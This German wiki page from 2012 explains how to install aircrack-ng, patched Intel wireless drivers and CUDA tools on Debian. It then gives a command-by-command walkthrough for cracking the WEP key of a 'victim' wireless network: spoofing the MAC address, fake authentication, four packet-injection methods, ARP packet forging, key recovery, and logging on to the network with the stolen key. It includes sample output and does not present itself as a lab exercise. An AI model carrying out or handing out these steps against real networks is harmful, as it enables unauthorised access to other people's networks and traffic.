IWL UND AIRCRACK-NG BENUTZUNGS UND INSTALL FAQ AUF DEBIAN

Aus OPPServer.net Wiki | OPPs Wiki
Wechseln zu: Navigation, Suche

IWL UND AIRCRACK-NG BENUTZUNGS UND INSTALL FAQ AUF DEBIAN (Stand 15.04.2012) [ © Oliver Schuetz aka OppTupacShakur | http://OPPServer.net | http://unix.oppserver.net ]

INSTALL UND CONFIG IWL

sudo aptitude install libnl-dev libssl-dev
sudo mkdir /usr/local/src/iwl
cd /usr/local/src/iwl
sudo rm -r iwlwifi-5000*
sudo wget http://intellinuxwireless.org/iwlwifi/downloads/iwlwifi-5000-ucode-8.83.5.1-1.tar.gz
sudo tar -vxzf iwlwifi-5000-ucode-8.83.5.1-1.tar.gz
sudo wget http://intellinuxwireless.org/iwlwifi/downloads/iwlwifi-5000-ucode-8.24.2.12.tgz
sudo tar -vxzf iwlwifi-5000-ucode-8.24.2.12.tgz
sudo cp -r ./iwlwifi-5000-ucode-*/*.ucode /lib/firmware/

Folgendes wird nur fuer Kernel unter 2.6.31 benoetigt:

sudo rm -r compat-wireless-* Download*
sudo wget http://wireless.kernel.org/en/users/Download
sudo wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2.6.tar.bz2
sudo tar xvfj compat-wireless-2.6.tar.bz2
cd compat-wireless-*
sudo wget http://patches.aircrack-ng.org/mac80211_2.6.28-rc4-wl_frag+ack_v3.patch
sudo patch -p1 < mac80211_2.6.28-rc4-wl_frag+ack_v3.patch
sudo wget http://patches.aircrack-ng.org/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
sudo patch -p1 < mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
sudo wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
sudo patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch

sudo make -j4
sudo make install
sudo rmmod iwlwifi
sudo rmmod iwlagn
sudo rmmod iwlcore
sudo rmmod mac80211
sudo make unload
sudo make wlunload
sudo make btunload

Ab hier auch wieder fuer 2.6.31+ benoetigt.

sudo su -c 'echo options iwl4965 swcrypto50=1 > /etc/modprobe.d/iwl_options.conf'
sudo su -c 'echo options iwl5000 swcrypto50=1 >> /etc/modprobe.d/iwl_options.conf'
sudo su -c 'echo options iwlagn swcrypto=1 >> /etc/modprobe.d/iwl_options.conf'

Nun einmal rebooten.


INSTALL UND CONFIG AIRCRACK-NG

Passende Kernel Headers und GCC muessen vorhanden sein und zum laufenden Kernel passen:

sudo aptitude install linux-headers-`uname -r` gcc-4.3
sudo aptitude install build-essential subversion subversion-tools
cd /usr/local/src
sudo rm -r aircrack-ng
sudo su -c 'svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng'
cd aircrack-ng
sudo make
sudo make install
sudo airodump-ng-oui-update


INSTALL UND CONFIG AIRCRACK-NG-CUDA

Passende Kernel Headers und GCC muessen vorhanden sein und zum laufenden Kernel passen:

sudo aptitude install linux-headers-`uname -r` gcc-4.3

Nvidia Treiber muessen aus http://debian.oppserver.net vorhanden sein:

sudo aptitude install nvidia-glx libvdpau-dev nvidia-cuda-dev nvidia-cuda-toolkit
sudo aptitude install build-essential subversion subversion-tools libglu1-mesa-dev libxi-dev libxmu-dev libsqlite3-dev
sudo mkdir /usr/src/cuda
cd /usr/src/cuda
sudo wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/sdk/gpucomputingsdk_4.1.28_linux.run
sudo chmod +x *.run
sh gpucomputingsdk_4.1.28_linux.run
cd /usr/local/src
sudo rm -r aircrack-ng-cuda
sudo su -c 'svn co http://trac.aircrack-ng.org/svn/branch/aircrack-ng-cuda/ aircrack-ng-cuda'
cd aircrack-ng-cuda
sudo CUDA=true make
sudo make CUDA=true sqlite=true unstable=true install
sudo airodump-ng-oui-update


IW INSTALLEN

sudo mkdir /usr/local/src/iw
cd /usr/local/src/iw
sudo rm -r *
sudo wget http://dl.aircrack-ng.org/iw.tar.bz2
sudo tar xvfj iw.tar.bz2
sudo make
sudo make install


OPFER WLAN SUCHEN

sudo airmon-ng start wlan0
sudo airodump-ng mon0

Mit strg-c einmal stoppen und sich die MAC adresse (BSSID),den channel (CH) und den Namen (ESSID) des WLan Routers/APs merken.


MONITORMODE EINSCHALTEN UND MAC ADRESSE AENDERN (FAKE MAC)

Karte in Monitor Mode mit "airmon-ng" (z.B. Channel 6 fuer Opfer Wlan)

sudo airmon-ng start wlan0 6

Karte in Monitor Mode mit "iwconfig" und "ifconfig" (z.B. Channel 6 fuer Opfer Wlan)

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo iwconfig wlan0 channel 6
sudo ifconfig wlan0 up


sudo aptitude install macchanger

Hier nun die aktuelle MAC merken, um sie spaeter evtl. wieder auf den original Wert zurueckzusetzen:

macchanger -s wlan0

So kann man sie auch einfach nach ~/wlan0_original_mac speichern:

sudo macchanger -s wlan0 > ~/wlan0_original_mac


sudo ifconfig wlan0 down
sudo ifconfig mon0 down
sudo macchanger --mac=00:11:22:33:44:55 wlan0
sudo macchanger --mac=00:11:22:33:44:55 mon0
sudo ifconfig wlan0 up
sudo ifconfig mon0 up

Hiermit wurde nun die FAKEMAC 00:11:22:33:44:55 auf wlan0 und mon0 gesetzt.


        1. WEP ####

AIRCRACK-NG, AIRODUMP-NG UND AIRREPLAY-NG ANLEITUNG

Injection testen:

sudo aireplay-ng -B -9 mon0

Falls noch eine WLan Verbindung auf wlan0 laeuft, einmal stopen:

sudo ifdown wlan0


IVs Sammeln mit "airodump-ng":

mkdir ~/aircrack_temp
sudo airodump-ng -w ~/aircrack_temp/ivsout -c CH -d BSSID mon0
(z.B.: sudo airodump-ng -w ~/aircrack_temp/ivsout -c 6 -d 99:88:77:66:55:44 mon0)

Falls man nun hier schon einen verbunden Client sieht, kann man mit Methode 1 weiter machen, ohne Client nur mit Methode 2 oder 3 (mein Favorit ist Methode 3)


Nun einen weiteren root Terminal oeffnen:

cd ~/aircrack_temp/

Fake Authentication mit "aireplay-ng"

sudo aireplay-ng -1 0 -e ESSID -a BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -1 0 -e TestWLAN -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Falls man folgenden Fehler bekommt: Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch muss man den Befehl anpassen und zwar so:

sudo aireplay-ng -1 0 --ignore-negative-one -e ESSID -a BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -1 0 --ignore-negative-one -e TestWLAN -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

oder:

sudo aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -1 6000 -o 1 -q 10 -e TestWLAN -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Falls man folgenden Fehler bekommt: Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch muss man den Befehl anpassen und zwar so:

sudo aireplay-ng -1 6000 --ignore-negative-one -o 1 -q 10 -e ESSID -a BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -1 6000 --ignore-negative-one -o 1 -q 10 -e TestWLAN -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Dies sollte dann dabei herauskommen:

Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)


METHODE 1

sudo aireplay-ng -3 -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -3 -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Falls man folgenden Fehler bekommt: Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch muss man den Befehl anpassen und zwar so:

sudo aireplay-ng -3 --ignore-negative-one -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -3 --ignore-negative-one -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Jetzt kann man im ersten root Terminal sehen das bei dem AP die Data Anzahl ziemlich schnell steig.


METHODE 2

sudo aireplay-ng -5 -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -5 -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Falls man folgenden Fehler bekommt: Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch muss man den Befehl anpassen und zwar so:

sudo aireplay-ng -5 --ignore-negative-one -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -5 --ignore-negative-one -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Warten bist ein Paket empfangen wurde und dann mit y > ENTER bestaetigen. Dann sollte folgende Meldung erscheinen:

Saving keystream in fragment-xxxx-xxxxxx.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Falls dann auch durch mehrmaliges y > ENTER immer wieder ein Still nothing, trying another packet... erscheint mit STRG+C abbrechen und eine weitere Methode testen.


METHODE 3

sudo aireplay-ng -4 -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -4 -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Falls man folgenden Fehler bekommt: Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch muss man den Befehl anpassen und zwar so:

sudo aireplay-ng -4 --ignore-negative-one -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -4 --ignore-negative-one -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Warten bist ein Paket empfangen wurde und dann mit y > ENTER bestaetigen. Durchlaufen lassen bis 100%, dann sollte folgende Meldung erscheinen:

Saving plaintext in replay_xxx-xxxx-xxxxxx.cap
Saving keystream in replay_xxx-xxxx-xxxxxx.xor

Completed in xxxs (xxx bytes/s)


METHODE 4

sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Falls man folgenden Fehler bekommt: Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch muss man den Befehl anpassen und zwar so:

sudo aireplay-ng -2 --ignore-negative-one -p 0841 -c FF:FF:FF:FF:FF:FF -b BSSID -h FAKEMAC mon0
(z.B.: sudo aireplay-ng -2 --ignore-negative-one -p 0841 -c FF:FF:FF:FF:FF:FF -b 99:88:77:66:55:44 -h 00:11:22:33:44:55 mon0)

Warten bist ein Paket empfangen wurde und dann mit y > ENTER bestaetigen.


NUR METHODE 2+3 Das empfangene in ein ARP Paket umwandeln.

cd ~/aircrack_temp/
sudo packetforge-ng -0 -a BSSID -h FAKEMAC -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w arp-paket
(z.B.: sudo packetforge-ng -0 -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-*.xor -w arp-paket)

oder:

cd ~/aircrack_temp/
sudo packetforge-ng -0 -a BSSID -h FAKEMAC -k 255.255.255.255 -l 255.255.255.255.255 -y replay_xxx-xxxx-xxxxxx.xor -w arp-paket
(z.B.: sudo packetforge-ng -0 -a 99:88:77:66:55:44 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255.255 -y replay_*.xor -w arp-paket)

Darauf sollte folgende Ausgabe erscheinen:

Wrote packet to: arp-paket


sudo aireplay-ng -2 -r arp-paket mon0

Mit y > ENTER bestaetigen.

Jetzt kann man im ersten root Terminal sehen das bei dem AP die Data Anzahl ziemlich schnell steig.


METHODE 1+2+3+4 Nun oeffnen wir den 3 root Terminal:

cd ~/aircrack_temp/
sudo aircrack-ng -z -b BSSID ivsout*.cap
(z.B.: sudo aircrack-ng -z -b 99:88:77:66:55:44 ivsout*.cap)

oder:

sudo aircrack-ng -a 1 -e N3ur0m4nc3r -b BSSID ivsout*.cap
(z.B.: sudo aircrack-ng -a 1 -e N3ur0m4nc3r -b 99:88:77:66:55:44 ivsout*.cap)

Dann sollte folgendes nach Kurz oder Lang erscheinen:

KEY FOUND! [ xx:xx:xx:xx:xx ] (ASCII: AT.HA )
        Decrypted correctly: 100%

Als naechstes koennen wir erstmal aireplay und airodump in den ersten 2 root Terminals mit STRG+C beenden und loggen uns wie folgt auf dem Router/AP an:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 essid ESSID channel CH key xx:xx:xx:xx:xx
(z.B.: sudo iwconfig wlan0 essid TestWLAN channel 6 key xx:xx:xx:xx:xx)
sudo ifconfig wlan0 up
(Falls noch nicht geschehen; sudo aptitude install dhcpcd)
sudo dhcpcd wlan0

Dabei sollte nun folgendes erscheinen:

interface wlan0 has been configured with new IP=xxx.xxx.xxx.xxx


        • Experimental und nicht getestet ****
        1. WPA/WPA2 ####
sudo aptitude install pyrit


        1. WPA/WPA2 (cuda) ####
sudo aptitude install pyrit

Nvidia Treiber muessen aus http://debian.oppserver.net vorhanden sein.

sudo aptitude install nvidia-glx libvdpau-dev nvidia-cuda-dev nvidia-cuda-toolkit
sudo aptitude install build-essential subversion subversion-tools libglu1-mesa-dev libxi-dev libxmu-dev
sudo mkdir /usr/src/cuda
cd /usr/src/cuda

[32bit]

sudo wget http://developer.download.nvidia.com/compute/cuda/3_1/toolkit/cudatoolkit_3.1_linux_32_ubuntu9.10.run
sudo wget http://developer.download.nvidia.com/compute/cuda/3_1/sdk/gpucomputingsdk_3.1_linux.run
sudo chmod +x *.run
sudo sh cudatoolkit_3.1_linux_32_ubuntu9.10.run
sudo sh gpucomputingsdk_3.1_linux.run

[64bit]

sudo wget http://developer.download.nvidia.com/compute/cuda/3_1/toolkit/cudatoolkit_3.1_linux_64_ubuntu9.10.run
sudo wget http://developer.download.nvidia.com/compute/cuda/3_1/sdk/gpucomputingsdk_3.1_linux.run
sudo chmod +x *.run
sudo sh cudatoolkit_3.1_linux_64_ubuntu9.10.run
sudo sh gpucomputingsdk_3.1_linux.run
sudo mkdir /usr/local/src/pyrit
cd /usr/local/src/pyrit
sudo wget http://pyrit.googlecode.com/files/cpyrit-cuda-0.3.0.tar.gz
sudo tar -vxzf cpyrit-cuda-0.3.0.tar.gz
cd cpyrit-cuda-0.3.0/
sudo python setup.py build
sudo python setup.py install


HF ;)

Meine Werkzeuge
Namensräume

Varianten
Aktionen
Navigation
Werkzeuge